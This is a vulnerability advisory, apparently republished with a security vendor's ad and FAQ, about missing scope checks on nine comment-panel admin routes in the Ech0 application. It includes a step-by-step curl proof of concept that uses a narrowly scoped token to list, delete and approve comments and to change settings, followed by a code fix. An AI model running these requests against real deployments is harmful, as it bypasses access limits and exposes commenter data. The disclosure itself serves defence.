Ech0 Comment Panel Endpoints Missing RequireScopes Middleware — Scoped Access Token Bypass — github.com/lin-snow/ech0
Missing AuthorizationSummary
All 9 comment panel admin endpoints (/api/panel/comments/*) are missing RequireScopes() middleware, while every other admin endpoint in the application enforces scope-based authorization on access tokens. An admin-issued access token scoped to minimal permissions (e.g., echo:read only) can perform full comment moderation operations including listing, approving, rejecting, deleting comments, and modifying comment system settings.
Details
The access token scope enforcement system works as follows: JWTAuthMiddleware (internal/middleware/auth.go) parses any valid JWT and injects a viewer into the request context. The RequireScopes() middleware (internal/middleware/scope.go:14) then checks whether the token is an access token and, if so, validates that it carries the required scopes. Session tokens are passed through without scope checks (by design — sessions represent full user authority).
Every admin route group applies RequireScopes() per-handler:
internal/router/echo.go— usesRequireScopes(ScopeEchoWrite)/RequireScopes(ScopeEchoRead)internal/router/file.go— usesRequireScopes(ScopeFileRead)/RequireScopes(ScopeFileWrite)internal/router/user.go— usesRequireScopes(ScopeAdminUser)/RequireScopes(ScopeProfileRead)internal/router/setting.go— usesRequireScopes(ScopeAdminSettings)/RequireScopes(ScopeAdminToken)
However, internal/router/comment.go:28-36 registers all 9 panel endpoints directly on AuthRouterGroup without any RequireScopes() call:
// internal/router/comment.go:28-36
appRouterGroup.AuthRouterGroup.GET("/panel/comments", h.CommentHandler.ListPanelComments())
appRouterGroup.AuthRouterGroup.GET("/panel/comments/:id", h.CommentHandler.GetCommentByID())
appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/status", h.CommentHandler.UpdateCommentStatus())
appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/hot", h.CommentHandler.UpdateCommentHot())
appRouterGroup.AuthRouterGroup.DELETE("/panel/comments/:id", h.CommentHandler.DeleteComment())
appRouterGroup.AuthRouterGroup.POST("/panel/comments/batch", h.CommentHandler.BatchAction())
appRouterGroup.AuthRouterGroup.GET("/panel/comments/settings", h.CommentHandler.GetCommentSetting())
appRouterGroup.AuthRouterGroup.PUT("/panel/comments/settings", h.CommentHandler.UpdateCommentSetting())
appRouterGroup.AuthRouterGroup.POST("/panel/comments/settings/test-email", h.CommentHandler.TestCommentEmail())
The service layer's requireAdmin() (internal/service/comment/comment.go:719-732) only validates the user's database role (IsAdmin/IsOwner), not the token's scopes:
func (s *CommentService) requireAdmin(ctx context.Context) error {
v := viewer.MustFromContext(ctx)
if v == nil || strings.TrimSpace(v.UserID()) == "" {
return commonModel.NewBizError(...)
}
user, err := s.commonService.CommonGetUserByUserId(ctx, v.UserID())
if err != nil { return err }
if !user.IsAdmin && !user.IsOwner {
return commonModel.NewBizError(...)
}
return nil
}
The scopes comment:read, comment:write, and comment:moderate are defined in internal/model/auth/scope.go:11-13 and registered as valid scopes, but are never referenced in any RequireScopes() middleware call anywhere in the codebase.
Execution flow: Request with access token (scoped to echo:read only) → JWTAuthMiddleware extracts user ID, sets viewer → No RequireScopes middleware → Handler calls service → requireAdmin() checks user.IsAdmin (true for admin user) → Operation succeeds.
PoC
# 1. As admin, create an access token scoped ONLY to echo:read
curl -X POST https://target/api/settings/access-tokens \
-H 'Authorization: Bearer <admin-session-token>' \
-H 'Content-Type: application/json' \
-d '{"name":"readonly","scopes":["echo:read"],"audience":["public-client"],"expiry_days":30}'
# Save the returned token as $TOKEN
# 2. Verify the token CANNOT access other admin endpoints (scoped correctly):
curl https://target/api/settings \
-H "Authorization: Bearer $TOKEN"
# Expected: 403 Forbidden (scope check blocks access)
# 3. Use the same limited token to list ALL comments (including pending/rejected):
curl https://target/api/panel/comments \
-H "Authorization: Bearer $TOKEN"
# Expected: 200 OK with full comment list (bypasses scope enforcement)
# 4. Delete a comment:
curl -X DELETE https://target/api/panel/comments/<comment-id> \
-H "Authorization: Bearer $TOKEN"
# Expected: 200 OK (should require comment:moderate scope)
# 5. Approve/reject comments:
curl -X PATCH https://target/api/panel/comments/<comment-id>/status \
-H "Authorization: Bearer $TOKEN" \
-H 'Content-Type: application/json' \
-d '{"status":"approved"}'
# Expected: 200 OK (should require comment:moderate scope)
# 6. Read comment system settings:
curl https://target/api/panel/comments/settings \
-H "Authorization: Bearer $TOKEN"
# Expected: 200 OK (may expose SMTP configuration)
# 7. Disable the comment system entirely:
curl -X PUT https://target/api/panel/comments/settings \
-H "Authorization: Bearer $TOKEN" \
-H 'Content-Type: application/json' \
-d '{"enable_comment":false}'
# Expected: 200 OK (should require admin:settings scope)
Impact
- Principle of least privilege violation: Access tokens designed to limit admin capabilities do not restrict comment panel access. An integration token intended only for reading echoes gains full comment moderation authority.
- Unauthorized comment moderation: An attacker who compromises a limited-scope access token (e.g., a CI/CD token scoped to
echo:read) can approve, reject, delete, and batch-modify all comments. - Data exposure: The panel comment listing endpoint returns commenter PII (email addresses, IP hashes, user agents) that should be restricted to tokens with
comment:readscope. - Settings modification: Comment system settings (including potentially SMTP configuration) can be read and modified, and test emails can be triggered, which could leak mail server credentials.
- Scope: The attack requires an admin-issued access token, which limits the attack surface (PR:H). However, access tokens are specifically designed for limited-privilege integrations, and this vulnerability negates those limits for the entire comment subsystem.
Recommended Fix
Add RequireScopes() middleware to all comment panel routes in internal/router/comment.go:
func setupCommentRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {
// ... captcha and public routes unchanged ...
// Admin Panel — enforce scopes on access tokens
appRouterGroup.AuthRouterGroup.GET("/panel/comments",
middleware.RequireScopes(authModel.ScopeCommentRead),
h.CommentHandler.ListPanelComments())
appRouterGroup.AuthRouterGroup.GET("/panel/comments/:id",
middleware.RequireScopes(authModel.ScopeCommentRead),
h.CommentHandler.GetCommentByID())
appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/status",
middleware.RequireScopes(authModel.ScopeCommentMod),
h.CommentHandler.UpdateCommentStatus())
appRouterGroup.AuthRouterGroup.PATCH("/panel/comments/:id/hot",
middleware.RequireScopes(authModel.ScopeCommentMod),
h.CommentHandler.UpdateCommentHot())
appRouterGroup.AuthRouterGroup.DELETE("/panel/comments/:id",
middleware.RequireScopes(authModel.ScopeCommentMod),
h.CommentHandler.DeleteComment())
appRouterGroup.AuthRouterGroup.POST("/panel/comments/batch",
middleware.RequireScopes(authModel.ScopeCommentMod),
h.CommentHandler.BatchAction())
appRouterGroup.AuthRouterGroup.GET("/panel/comments/settings",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.CommentHandler.GetCommentSetting())
appRouterGroup.AuthRouterGroup.PUT("/panel/comments/settings",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.CommentHandler.UpdateCommentSetting())
appRouterGroup.AuthRouterGroup.POST("/panel/comments/settings/test-email",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.CommentHandler.TestCommentEmail())
}
Deep Security Visibility Without the Complexity
SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.
- No setup fees
- 5-min deployment
- Cancel anytime
Frequently Asked Questions
A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.
CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.
A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.
Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.
Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.
SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.